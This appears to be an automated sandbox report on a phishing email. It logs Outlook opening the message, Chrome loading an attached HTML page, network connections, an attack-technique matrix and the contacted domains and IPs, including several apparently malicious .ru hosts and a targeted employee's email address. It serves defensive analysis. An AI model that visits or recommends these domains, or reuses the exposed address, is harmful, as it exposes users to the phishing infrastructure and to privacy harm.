          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62524 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62501 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62490 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62512 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62506 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62513 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62541 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62518 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62535 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62489 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62540 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62511 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62505 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62513
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62515
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62516
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62517
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62518
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62519
          Source: unknownNetwork traffic detected: HTTP traffic on port 62486 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62510
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62511
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62512
          Source: unknownNetwork traffic detected: HTTP traffic on port 62522 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62516 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62497 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62524
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62525
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62526
          Source: unknownNetwork traffic detected: HTTP traffic on port 62523 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62520
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62521
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62522
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62523
          Source: unknownNetwork traffic detected: HTTP traffic on port 62517 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62491 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62535
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62536
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62537
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62538
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62532
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62533
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 62500 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62540
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62541
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62542
          Source: unknownNetwork traffic detected: HTTP traffic on port 62485 -> 443
          Source: unknownHTTPS traffic detected: 20.190.159.68:443 -> 192.168.2.17:49703 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.190.159.68:443 -> 192.168.2.17:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.17:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.190.159.68:443 -> 192.168.2.17:49737 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.17:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.137.106.217:443 -> 192.168.2.17:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.137.106.217:443 -> 192.168.2.17:49749 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.137.106.217:443 -> 192.168.2.17:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:62521 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:62533 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:62536 version: TLS 1.2
          Source: classification engineClassification label: mal68.phis.winEML@32/68@60/310
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240828T1542510715-7008.etl
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phish_alert_iocp_v1.4.48 (43).eml"
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "497F7768-6DCF-45A4-919E-3A217435DEB9" "B73ADBC6-9D33-4684-B34E-C899375883D2" "7008" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RA2DLVFO\VM-20240828-03940.html
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1824,i,15988177734497601794,1818530608862503201,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "497F7768-6DCF-45A4-919E-3A217435DEB9" "B73ADBC6-9D33-4684-B34E-C899375883D2" "7008" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RA2DLVFO\VM-20240828-03940.html
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1824,i,15988177734497601794,1818530608862503201,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting
          Valid AccountsWindows Management Instrumentation1
          Scripting
          1
          Process Injection
          1
          Masquerading
          OS Credential Dumping1
          Process Discovery
          Remote ServicesData from Local System2
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Process Injection
          LSASS Memory1
          File and Directory Discovery
          Remote Desktop ProtocolData from Removable Media1
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Registry Run Keys / Startup Folder
          1
          Registry Run Keys / Startup Folder
          1
          Deobfuscate/Decode Files or Information
          Security Account Manager13
          System Information Discovery
          SMB/Windows Admin SharesData from Network Shared Drive2
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading
          NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/RA2DLVFO/VM-20240828-03940.html#?em=sschultz@firstfedweb.com0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          8flx.oapuot.ru
          104.21.44.138
          truefalse
            unknown
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              unknown
              plus.l.google.com
              142.250.186.174
              truefalse
                unknown
                github.com
                140.82.121.4
                truefalse
                  unknown
                  cs837.wac.edgecastcdn.net
                  192.229.133.221
                  truefalse
                    unknown
                    href.li
                    192.0.78.26
                    truefalse
                      unknown
                      code.jquery.com
                      151.101.2.137
                      truefalse
                        unknown
                        d2vgu95hoyrpkh.cloudfront.net
                        13.32.145.9
                        truefalse
                          unknown
                          play.google.com
                          142.250.186.46
                          truefalse
                            unknown
                            cdnjs.cloudflare.com
                            104.17.25.14
                            truefalse
                              unknown
                              challenges.cloudflare.com
                              104.18.95.41
                              truefalse
                                unknown
                                get.geojs.io
                                104.26.1.100
                                truefalse
                                  unknown
                                  www.google.com
                                  172.217.16.132
                                  truefalse
                                    unknown
                                    t0ca.maktated.ru
                                    188.114.97.3
                                    truefalse
                                      unknown
                                      d19d360lklgih4.cloudfront.net
                                      65.9.86.22
                                      truefalse
                                        unknown
                                        objects.githubusercontent.com
                                        185.199.110.133
                                        truefalse
                                          unknown
                                          oivbp.ckliths.com
                                          172.67.198.3
                                          truefalse
                                            unknown
                                            cdn.socket.io
                                            unknown
                                            unknownfalse
                                              unknown
                                              ok4static.oktacdn.com
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.w3schools.com
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  apis.google.com
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    NameMaliciousAntivirus DetectionReputation
                                                    file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/RA2DLVFO/VM-20240828-03940.html#?em=sschultz@firstfedweb.comtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    142.250.186.46
                                                    play.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    172.67.198.3
                                                    oivbp.ckliths.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    65.9.86.22
                                                    d19d360lklgih4.cloudfront.netUnited States
                                                    16509AMAZON-02USfalse
                                                    142.250.186.174
                                                    plus.l.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    20.189.173.5
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    172.217.18.14
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    104.26.1.100
                                                    get.geojs.ioUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    18.245.31.33
                                                    unknownUnited States
                                                    16509AMAZON-02USfalse
                                                    2.19.126.147
                                                    unknownEuropean Union
                                                    16625AKAMAI-ASUSfalse
                                                    142.251.168.84
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    142.250.185.163
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    142.250.186.131
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    151.101.194.137
                                                    unknownUnited States
                                                    54113FASTLYUSfalse
                                                    35.190.80.1
                                                    a.nel.cloudflare.comUnited States
                                                    15169GOOGLEUSfalse
                                                    185.199.110.133
                                                    objects.githubusercontent.comNetherlands
